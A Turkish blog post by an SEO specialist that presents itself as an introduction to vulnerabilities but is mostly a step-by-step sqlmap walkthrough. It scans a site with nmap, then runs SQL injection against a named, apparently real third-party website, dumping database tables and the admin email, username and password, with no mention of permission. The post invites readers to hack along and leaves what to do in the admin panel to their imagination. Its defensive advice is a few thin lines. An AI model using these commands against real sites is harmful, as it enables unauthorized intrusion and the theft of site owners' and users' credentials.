Siber Güvenlik

Güvenlik Açığı Nedir ve Nasıl Bulunur? 2022

Güvenlik açığı nedir sorusuna verebileceğim en iyi cevap; bir çilingirin habersizce ekipmanlarını kullanarak bir eve girmesi olarak özetlerim. Güvenlik açıkları nasıl bulunur konusuna gelecek olursak bu makalenin sonunda siber güvenlik sektörüne en sağlam adımı atmış hatta bir çok konuda uzmanlaşmış hale geleceksiniz 🙂

Güvenlik Açığı bulmanın en kolay yolu, güvenlik açığı aradığınız sistemin nasıl işlediğini bilmekten geçer.

Güvenlik Açığı Nasıl Bulunur ?

Bu bölümde göstereceğim tüm güvenlik açığı bulma yöntemleri web siteleri için geçerlidir 🙂

Alt Yapıyı Öğrenin

Güvenlik açığı aradığınız sistemin hangi programla dili ile yapıldığını ve Wordpress gibi içerik yönetim sistemi mi kullanıyor? Yoksa bir yazılımcının özel olarak yazdığı bir script diğer adıyla paket program mı değil mi öğrenmeniz tüm yapacaklarınızın başında gelir. Çünkü Wordpress gibi içerik yönetim sistemlerinde açık bulmak diğer scriptlere nazaran daha zordur.

Kali Linux Kullanın

Kali Linux işletim sistemi içerisinde bir çok siber güvenlik aracı bulundurur. Özellikle web güvenliği için içerisinde çok özel araçlar bulunmaktadır. Makalemin geri kalanında kali linux üzerinden örnekler vereceğim.

Açık Port Kontrolü Yapın

Alt yapısını örendiğiniz web sitesinin sunucusunda çalışan açık portları öğrenmeniz işinizi daha hızlı bitirmenize çok yardımcı olacaktır. Kali linux üzerinde nmap port tarama kodu kullanarak port taraması yapmanızı sağlayacak kodu hemen aşağıda sizlere verdim 🙂

nmap -v --script vuln www.hedefsite.info

Yukarıdaki nmap port tarama kodunun örnek ekran çıktısı aşağıdaki gibi olacaktır;

Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-17 09:57 IST
PORT     STATE SERVICE
25/tcp   open  smtp
| smtp-vuln-cve2010-4344:
|_  The SMTP server is not Exim: NOT VULNERABLE
| ssl-dh-params:
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: postfix builtin
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024

İllaki port taraması yapmanıza gerek yok fakat yapmanızda fayda var 🙂

URL Yapısını Kontrol Edin

URL yapısında GET Request gönderen sitelerde sql injection açığı gibi kritik önem taşıyan açıkların bulunma ihtimali çok daha yüksektir. Sizler için GET Request kullanan ve sql açığı olan bir site buldum gelin hackleyelim 🙂

Hacking Aşamasına Geçmek

SQL Injection açığı bulunduran siteleri hackleyebilecek en propüler kali linux araçlarından biri SQLMap aracıdır.

Hedef site olarak “https://www.smtmax.com/category.php?id=15%27” sitesini seçtim Not: Tamamen örnek göstermek amaçlıdır.

Bir sitede sql açık olup olmadığını anlamak için “orneksite.com/index.php?id=1” ? parametresinden sonra gelen sayısal veya metinsel değerin sonuna ‘ işareti koymanız yeterli olacaktır. Sql açığı testinden açık ola sonuçlanan bir sitenin vereceği hatanın resmini aşağıda örnek olarak bırakıyorum.

Güvenlik Açığı

Kali Linux işletim sistemini açın devamında terminallide açın ve aşağıdaki kodu yapıştırın.

sqlmap -u "https://www.smtmax.com/category.php?id=15%27" --dbs
sqlmap kullanım

Yukarıdaki kodu kullandığınızda SQLMap karşınıza böyle bir sonuç çıkartacaktır. Devamında aşağıdaki kodu kullanmanız gerekecek.

sqlmap -u HEDEFURL -D veritabanıadı --tables

Yukarıdaki kodun açıklaması;

-u yani hedef sitenin linki Hedefurl yazdığım yere sitenin linkini yapıştıra bilirsiniz. Bu kopyala yapıştır işleriyle uğraşmak istemiyorsanız klavyenizin sağında bulunan yukarı ok tuşunu kullanın 🙂

-D nin anlamı veratabanı demektir. -D yazıp bir boşluk bıraktıktan sonra veritabanıadı yazdığım yere yukarıda –dbs olarak çalıştırdığımız kodun bize verdiği “available database” sonuçlarında yer alan veri tabanı adını yazıyoruz ve sonuna “–tables” parametresini giriyoruz. Bu parametrenin anlamı veri tabanı içindeki tabloları çek anlamına gelmektedir.

sqlmap sql injection açığı

Yukarıda açıklamasını yaptığım kodun ekran çıktısının görseli yukarıdadır. Sizde isimler farklı olabilir her sitenin çıktıları farklıdır ama sqlmap çıktı yapısı aynıdır 🙂 Gelelim bir sonraki kodumuza.

sqlmap -u HEDEFURL -D veritabanıadı -T TABLOADI --columns

Yukarıdaki kodun açıklaması ise –tables ibaresini silip -T yapıyoruz ve önceki komutta karşımıza çıkan tablo adını yazıyoruz devamında –columns parametresi ile tablo içindeki kolonları istiyoruz.

Yukarıdaki kodu kullandığımızda göreceğimiz sonuçların görselini yine sizlerle yukarıda paylaştım.

Sıradaki kodumuz ise en sevdiğim admin kullanıcı adını ve şifresini çekmekte 🙂 Bunun için kullanmamız gereken kod aşağıda.

sqlmap -u HEDEFURL -D veritabanıadı -T TABLOADI -C KOLONADI --dump

Yukarıda bulunan son kodumuzu hemen ne iş yaptığını açıklayayım. –columns parametresini -C olarak değiştiriyoruz çünkü bir önceki adımda kolon isimlerini öğrendik geriye sadece –dump komutu ile kolon içindeki veriyi çekmek kaldı. -C bir boşluk bırakıp kolon adını yazın bir boşluk daha bırakıp –dump kodunu yazın ve çalıştırın.

sqlmap veri çekme

Evet karşımızda admin email adresi, kullanıcı adı ve şifresi var 🙂 geriye kalan tek şey admin paneline girip hayal gücünüze bırakmakta.

Güvenlik Açıklarından Korunma Yolları Nelerdir?

SQL injection açığından korunmak sanılanın üzerine daha kolaydır. Bir güvenlik duvarı kullan ve yazılımızı daha önceden test edin herhangi bir güvenlik açığı var mı yok mu kontrol edin. Bunlara ayıracak vaktiniz ve maddiyatınız yoksa Wordpress tam size göre 🙂

Güvenlik Açığı Nedir

Güvenlik açığı nedir sorusuna verebileceğim en iyi cevap; bir çilingirin habersizce ekipmanlarını kullanarak bir eve girmesi olarak özetlerim.

Güvenlik Açığı Nasıl Oluşur?

Güvenlik açığı, bir yazılımın veya sistemin yazılımcısı tarafından algoritmasında bilinçli veyahut bilinçsiz olarak hatalı veya eksik kalan kod hatalarından kaynaklı oluşan özel kapılara Güvenlik Açığı denir.

Güvenlik Açığı Taraması Nedir?

Güvenlik Açığı Taraması, linux veya windows sistemler üzerinde kullanılan özel programlar aracılığıyla hedef sistemin taranması ve güvenlik açıklarının bulunmasıdır.

0 Gün Güvenlik Açığı Saldırısı Nedir?

0 Gün Güvenlik Açığı Saldırısı sistem sahibi veya yöneticisinin henüz haberdar olmadığı bir güvenlik açığına söylenen bir açık terimidir. Açık sadece hacker tarafından bilindiği için adı 0 gün açığıdır.

] }

Alp Eren Güney

Alp Eren Güney Kimdir? Alp Eren Güney 5 yıla aşkın süredir SEO ve Wordpress sektöründe profesyonel olarak hizmet vermektedir. Şuanda Moradam Dijital Pazarlama Ajansında SEO Uzmanı olarak görev almaktadır.

Bir cevap yazın

E-posta hesabınız yayımlanmayacak.

Başa dön tuşu